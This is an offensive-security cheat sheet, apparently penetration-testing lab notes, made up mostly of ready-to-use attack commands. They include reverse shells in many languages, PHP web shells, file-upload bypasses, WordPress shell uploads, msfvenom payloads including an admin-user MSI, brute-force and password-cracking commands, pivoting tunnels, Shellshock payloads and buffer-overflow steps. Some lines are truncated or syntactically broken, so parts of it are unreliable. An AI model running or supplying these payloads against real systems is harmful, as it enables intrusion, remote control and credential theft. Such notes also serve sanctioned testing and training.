
Exploitation Cheat Sheet

Reverse Shells


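# Netcat reverse shells. -e (traditional netcat, ncat) and -c (some builds) hand
# the connection to a program. The OpenBSD netcat shipped on many distros has
# neither flag - if these fail, use the named-pipe variant that follows.
nc -e /bin/bash IPADDRESS PORT
nc -c /bin/bash IPADDRESS PORT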

Netcat no -e or -c

# Netcat without -e/-c: a named pipe (fifo) carries the shell's output back into
# nc's stdin, so the two processes form a loop through the attacker's socket.
pipe=/var/tmp/backpipe
rm -f "$pipe"
mkfifo "$pipe"
nc IPADDRESS PORT 0<"$pipe" | /bin/bash 1>"$pipe"


bash -i >& /dev/tcp/ 0>&1


perl -e 'use Socket;$i="";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'



python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'

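# UDP reverse shell - pair with the socat UDP listener below (udp-listen:100).
# Fixes vs. the original copy: attacker IP restored; "/dev/null" uses double quotes
# (single quotes inside the single-quoted python -c string would end the shell
# string early and hand python an unquoted /dev/null); closing quote restored.
python -c 'import socket,pty,os;lhost = "IPADDRESS"; lport = 100; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect((lhost, lport)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); os.putenv("HISTFILE","/dev/null"); pty.spawn("/bin/bash"); s.close();'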


ruby -rsocket -e'"",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'



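# Listener (attacker): a fully interactive pty over TCP on 4444. Pair with the
# exec: line below; this is the nicest shell socat gives you.
socat file:$(tty),raw,echo=0 tcp-listen:4444

# Reverse shell (target, needs socat installed there). The attacker host:port
# after "tcp:" was lost in the original copy.
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:IPADDRESS:4444

# UDP listener - pairs with the python UDP shell above (port 100)
socat file:$(tty),echo=0,raw udp-listen:100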


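# Using Telnet and a created node: telnet has no -e, so a fifo feeds the shell's
# output back into the telnet session (attacker IP was lost in the original copy).
mknod /var/tmp/backpipe p; telnet IPADDRESS 53 0</var/tmp/backpipe | /bin/bash 1>/var/tmp/backpipe

# Using Telnet and Telnet: commands arrive on the first connection (port 53) and
# output leaves on the second (port 54) - run two listeners on the attacker.
telnet IPADDRESS 53 | /bin/bash | telnet IPADDRESS 54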

OpenSSL Encrypted Reverse Shell

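# Generate certificate: self-signed, with an unencrypted key (-nodes) so the
# listener can start without a passphrase prompt.
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

# Listener:
openssl s_server -quiet -key key.pem -cert cert.pem -port <PORT>

# Reverse Shell (the original copy had this line pasted twice). The fifo carries
# s_client's output back into sh's stdin. s_client does not verify the server
# certificate here, which is acceptable because you control both ends. The fifo
# path is fixed and predictable: mkfifo fails if /tmp/s already exists, so on a
# shared host pick a unique name (e.g. from mktemp -u).
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/s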

Upgrade Reverse Shell to Support tab completion/hot keys

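# In reverse shell: allocate a pty so tab completion, job control and Ctrl-C
# reach the remote shell instead of killing the connection.
python -c 'import pty; pty.spawn("/bin/bash")'

# In Kali: background the shell with Ctrl-Z first, then put the local terminal
# into raw mode and bring the shell back. Without the fg the shell stays suspended.
stty raw -echo; fg

# In reverse shell - optional: tell the pty what it is talking to.
export SHELL=bash
export TERM=xterm-256color
# take <num>/<cols> from `stty size` in the Kali terminal; `reset` repairs a garbled screen
stty rows <num> columns <cols>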


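# PHP reverse shell (one-liner). Attacker IP was lost in the original copy.
# "<&3" assumes the socket became descriptor 3, i.e. nothing else was open - if
# the shell comes back dead, check the fd number with ls -l /proc/$$/fd.
php -r '$sock=fsockopen("IPADDRESS",1234);exec("/bin/sh -i <&3 >&3 2>&3");'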

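# Simple PHP shell.php (attacker IP and port were lost in the original copy)
<?php /* relies on the web user's shell being bash (needed for /dev/tcp) */ echo shell_exec("bash -i >& /dev/tcp/IPADDRESS/PORT 0>&1");?>

#PHP popen - attacker IP comes from the query string: shell.php?0=ATTACKERIP (needs a netcat with -e)
<?php popen("(nc -nv $_GET[0] 443 -e /bin/bash)2>&1","r"); ?>

#PHP fsockopen - "<&3" assumes the socket is descriptor 3, see the php -r note above
<?php fsockopen("IPADDRESS", 443);`/bin/sh -i <&3 >&3 2>&3`; ?>

#PHP Reverse Shell with Base64. The blob decodes to the perl one-liner above with
# $i="10.11.0.53" and $p=1234 baked in - it will NOT call back to you as-is.
# Regenerate it: echo -n '<perl one-liner with your IP/port>' | base64 -w0
<?php shell_exec(base64_decode("cGVybCAtZSAndXNlIFNvY2tldDskaT0iMTAuMTEuMC41MyI7JHA9MTIzNDtzb2NrZXQoUyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCJ0Y3AiKSk7aWYoY29ubmVjdChTLHNvY2thZGRyX2luKCRwLGluZXRfYXRvbigkaSkpKSl7b3BlbihTVERJTiwiPiZTIik7b3BlbihTVERPVVQsIj4mUyIpO29wZW4oU1RERVJSLCI+JlMiKTtleGVjKCIvYmluL3NoIC1pIik7fTsn"))?>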

PAYLOAD: <?=`$_GET[0]`?>

PAYLOAD: <?=$_GET[0]($_POST[1]);?>
URL: `?0=system` names the function in the query string; the POST body `-d 1=id` supplies its argument (the URL part was lost in the original copy).

PAYLOAD: <?php extract($_GET); $a($b)?>   (extract(), not export(): it turns each query parameter into a variable, so ?a=system&b=id runs id)

PAYLOAD: <?php system($_GET["cmd"]); ?>

PAYLOAD: <?php shell_exec(base64_decode($_GET["cmd"])) ?>


Reverse SSH tunnel

This attack requires having credentials on both machines, and can be used for NAT-ed environments.
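#Executed on remote host: publish its own sshd (port 22) on the attacker's
#localhost:60000 (attacker IP was lost in the original copy).
ssh -NR 60000:localhost:22 user@YOURIPADDRESS
#Executed on attacking machine: "user" is an account on the remote host, the
#connection goes back through the tunnel.
ssh user@localhost -p 60000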

Have SSH execute a command before the remote shell is loaded

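# -t forces a pty so the command gets an interactive terminal
ssh user@IPADDRESS -t "/bin/sh"

# Try to get SSH to not load the shell's rc file. --noprofile alone skips only the
# login profile; an interactive non-login bash still reads ~/.bashrc, so --norc is
# the flag that actually matters here.
ssh user@IPADDRESS -t "bash --norc --noprofile"

# Shellshock (CVE-2014-6271) via SSH: the requested command is exported to a
# forced/restricted command as an environment variable, and an unpatched bash
# executes what follows the function definition. Only works against a
# vulnerable bash.
ssh user@IPADDRESS -t "() { :; }; /bin/bash"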

File Transfers

php ftp sequence to transfer netcat on linux

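<?php /* The space before ">" matters: in sh, "21>file" redirects descriptor 21,
   so "open" would go to stdout and the script file would start empty.
   The attacker IP was lost in the original copy. */
echo shell_exec("echo open IPADDRESS 21 >/usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo user offsec lab>> /usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo binary>> /usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo get netcat /usr/local/databases/netcat>>/usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo bye>> /usr/local/databases/ftp.txt");?>

<?php /* -n disables auto-login so the "user" line in the script is used */ echo shell_exec("ftp -n < /usr/local/databases/ftp.txt");?>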

Windows FTP via text file

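REM The space before ">" matters: cmd reads "21>" as "1>" (stdout redirect) and
REM writes "open ... 2" into the file. The attacker IP was lost in the original copy.
echo open IPADDRESS 21 > ftp.txt
echo USER username>> ftp.txt
echo mypassword>> ftp.txt
echo bin>> ftp.txt
echo GET wget.exe>> ftp.txt
echo bye>> ftp.txt
REM -n disables auto-login (credentials come from the script), -s runs the script,
REM -v suppresses server responses
ftp -v -n -s:ftp.txt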


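REM Build a tiny PowerShell downloader from cmd (no quoting headaches): $storageDir
REM is never used and only kept so the first line creates the file.
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://IPADDRESS/file.exe" >>wget.ps1
echo $file = "output-file.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
REM -ExecutionPolicy Bypass only affects this process; -NoProfile avoids the user's profile scripts
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1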

TFTP, usually enabled by default in Server 2003, XP, and below

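# Start tftp server on Kali ("aftpd" in the original is a typo for atftpd);
# --daemon backgrounds it, files are served from the given directory.
atftpd --daemon --port 69 /tftp

# Transfer files from Kali to Windows (from windows terminal). -i selects binary
# (octet) mode - without it an .exe arrives corrupted.
tftp -i IPADDRESS GET nameoffile.exe

# FreeBSD: fetch is the stock HTTP client (no wget/curl needed)
fetch http://IPADDRESS/filename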

Command Injection

command1 && command2 runs command2 only if command1 succeeds (exit status 0).

command1 || command2 runs command2 only if command1 fails.

command1 ; command2 runs command1, then command2, regardless of the result.

command1 | command2 runs both and feeds command1's output into command2's input.


# Windows

Bypassing File Uploads

# Bypass client side checking
Submit Request through burp and change file extension with intercept from .jpg back to .php

# Double Extension Injection

# Invalid Extension Bypass

#Bypass Content-Type Verification
Intercept in burp and change Content-Type to image/gif, image/jpg, or image/png

# Null byte Injection
Name the file e.g. shell.php%00.jpg so a C-string-based extension check stops at the null byte and sees ".jpg" while the file is stored as shell.php.
Or edit the hex in the request in burp to 00

# Upload .htaccess
# Example .htaccess contains: AddType application/x-httpd-php .jpg
# This instructs Apache to run .jpg files as php, then upload malicious jpg

# Bypass blacklists
PHP, pHp, PhP, pHP, php3, php4, php5, php7, phtml, etc

# Content Length Bypass
Use a small payload: <?system($_GET[0]);
Or fill file with lots of junk 

# Image Header in File

Word Press

Once logged into the interface try to get reverse shell by either editing an existing theme, uploading a new theme, or uploading a new plugin.

Editing a theme, paste in your own reverse shell code and browse to it, normally it's under http://IPADDRESS/wp-content/themes/nameoftheme/page.php

If uploading as a plugin, make sure the shell.php file has the appropriate plugin comments or it will "fail" when uploading. Comments should look like this:
	    Plugin Name: WordPress Shell
	    Plugin URI:
	    Description: blah blah
	    Author: Hackerman
	    Version: 0.2
	    Author URI:
	Then browse to the plugin page, normally: http://IPADDRESS/wp-content/plugins/shell/shell.php

Generating Payloads

PHP reverse shell payload

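# PHP reverse shell payload (drop in a writable web directory, then browse to it)
msfvenom -p php/reverse_php LHOST=YOURIPADDRESS LPORT=443 > shell.php

# Windows reverse shellcode for python script buffer overflow.
# -b lists the bad characters found for *this* target in the debugger - redo that
# analysis per target; -e picks an encoder that avoids them (alpha_mixed is
# alphanumeric: bulky, but survives very restrictive filters).
msfvenom -p windows/shell_reverse_tcp LHOST=YOURIPADDRESS LPORT=443 -f c -e x86/alpha_mixed -b "\x00\x04\xcd\x77\x3f"

# Windows bind shellcode for python script buffer overflow
msfvenom -p windows/shell_bind_tcp LPORT=444 -f c -e x86/shikata_ga_nai -b "\x00\x04\xcd\x77\x3f"

# Meterpreter exe with reverse shell, 32- and 64-bit (LHOST was missing from the
# x64 line in the original copy)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOURIPADDRESS LPORT=4444 -f exe > meterpreter.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=YOURIPADDRESS LPORT=4444 -f exe > met64.exe

# WAR file for Apache Tomcat (deploy through the manager application)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=YOURIPADDRESS LPORT=443 -f war > shell.war

# The WAR contains a randomly named .jsp (not .js); unpack it to learn the name,
# then browse to it under the deployed context (typically /shell/<name>.jsp)
jar -xvf shell.war

# Windows MSI that adds a local user. Must run with admin rights to succeed;
# msi-nouac builds it so the installer does not trigger a UAC prompt.
msfvenom -f msi-nouac -p windows/adduser USER=hackerman PASS=password -o add_user.msi

# Linux shellcode as little-endian JavaScript (LHOST was lost in the original copy)
msfvenom -p linux/x86/shell_reverse_tcp LHOST=YOURIPADDRESS LPORT=443 -f js_le

# Linux elf binary (-b "\x00" keeps null bytes out of the payload)
msfvenom -p linux/x86/shell_reverse_tcp LHOST=YOURIPADDRESS LPORT=443 -b "\x00" -f elf -o filename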

Brute Forcing


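# MSSQL "sa" with a wordlist. Before any of these, check the target's lockout
# policy - a few failures can lock the very account you are after.
hydra -l sa -P /usr/share/wordlists/rockyou.txt IPADDRESS mssql

# -e nsr additionally tries an empty password (n), the username (s) and the
# reversed username (r); -n sets a non-default port
medusa -h IPADDRESS -u sa -P /usr/share/wordlists/rockyou.txt -e nsr -m mssql -nPORTNUMBER

# RDP: domain accounts are routinely locked after a handful of bad logins
ncrack -u administrator -P /usr/share/wordlists/rockyou.txt -p 3389 IPADDRESS

hydra -l root -P /usr/share/wordlists/rockyou.txt IPADDRESS ssh

medusa -h IPADDRESS -u root -P /usr/share/wordlists/rockyou.txt -e nsr -m ssh

# Word Press: the success condition (S=) is the redirect to wp-admin. The space
# between http-post-form and the quoted module string was missing in the original,
# which fuses them into one unknown service name.
hydra -l admin -P /usr/share/wordlists/rockyou.txt IPADDRESS http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:S=Location\:.*/wp-admin/" -e nsr

# FTP (the wordlist was misspelled "rockyout.txt" in the original)
hydra -l admin -P /usr/share/wordlists/rockyou.txt IPADDRESS -e nsr ftp

# Generic login form: replace FAILMESSAGE with the exact text the page shows on a bad login
hydra -l admin -P /usr/share/wordlists/rockyou.txt IPADDRESS http-post-form "/login.php:username=^USER^&password=^PASS^:FAILMESSAGE" -e nsr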

Password Cracking

hashcat -m 1800 -a 0 -o hashes.txt --remove hashes.txt rockyou.txt

Identify hashes


SSH passphrase

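# ssh2john turns the encrypted private key into a john-readable hash; john then
# tries the wordlist against the passphrase (it never needs the remote host).
ssh2john id_rsa  > sshtocrack
john --wordlist=/usr/share/wordlists/rockyou.txt sshtocrack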

SSH tunnels and Port Forwarding

Port forward with plink on Windows

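# Port forward with plink on Windows: -R makes the attacker's 127.0.0.1:445 reach
# the Windows host's own port 445 (the middle host:port was lost in the original
# copy; 127.0.0.1:445 is the usual choice for SMB pivoting - adjust if needed).
plink.exe -l root -R 445:127.0.0.1:445 YOURIPADDRESS

# Meterpreter port forward: local 9090 -> TARGETIP:9090 through the session
portfwd add -l 9090 -p 9090 -r TARGETIP

# Dynamic (SOCKS) tunnel on local port 8080 for proxychains; -f backgrounds ssh,
# -N opens no remote shell
ssh -f -N -D 8080 root@IPADDRESS

# Proxychains to open a second SOCKS tunnel through the first pivot (the host
# was lost in the original copy)
proxychains4 ssh -f -N -D 8090 hackerman@IPADDRESS -p 222

# Reverse tunnel: port 8090 on YOURIPADDRESS is forwarded to this host's 8090
ssh -R 8090:localhost:8090 YOURIPADDRESS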


() { :; };

Reverse shell

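# Shellshock payload (goes into a header / environment variable, not typed at a
# prompt). The inner command is quoted so the redirections belong to the inner
# bash rather than to the outer "bash -c".
() { :; }; /bin/bash -c '/bin/bash -i >& /dev/tcp/YOURIPADDRESS/PORT 0>&1' &
# Probe: a CGI server exports the User-Agent header into the environment, where
# an unpatched bash executes what follows the function body. The \$ stops the
# local shell from expanding $(</etc/passwd) before it is sent.
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80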

Buffer Overflow

Generate unique pattern using metasploit module

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000

Find unique pattern that EIP displays

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 42376942

Check for bad chars, insert into script then check debugger for any breaks in sequence

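# Bad-character probe: every byte value from \x01 to \xff (the original copy had
# lost all but the last row). \x00 is left out from the start because it ends
# C strings. Send this after the EIP overwrite, compare the stack dump in the
# debugger against this sequence, remove the first byte that is missing or
# mangled, and resend until the dump matches. In Python 3 prefix with b"" so it
# can be written to a socket.
badchars = (
 "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
 "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
 "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
 "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
 "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
 "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
 "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
 "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
 "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
 "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
 "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
 "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
 "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
 "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
 "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
 "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )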

Find JMP ESP address ("\xff\xe4") using in debugger

!mona find -s "\xff\xe4" -m nameofprogram.dll